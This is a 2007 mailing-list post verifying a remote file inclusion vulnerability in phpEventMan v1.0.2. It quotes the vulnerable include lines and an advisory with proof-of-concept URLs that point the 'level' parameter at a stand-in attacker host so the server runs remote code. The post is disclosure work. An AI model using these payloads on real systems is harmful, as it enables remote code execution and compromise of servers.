[VIM] true: phpEventMan RFI Vuln.
str0ke
str0ke at milw0rm.com
Thu Feb 1 10:23:16 EST 2007
first line of code in both files are
common.function.php
include_once($level."Shared/sharedfunctions.php");
text.ctrl.php
include_once($level."UserMan/controller/common.function.php");
/str0ke
-----------------------------------------------
phpEventMan v1.0.2 (level) Remote File Include Exploit
-----------------------------------------------
Author: Cyber-Security
cyber-security.org
-----------------------------------------------
Code:
include_once($level."UserMan/controller/common.function.php");
include_once($level."Shared/sharedfunctions.php");
-----------------------------------------------
POC:
www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts
?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts
?
-----------------------------------------------
download: http://sourceforge.net/project/showfiles.php?group_id=169887
-----------------------------------------------
Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594
More information about the VIM
mailing list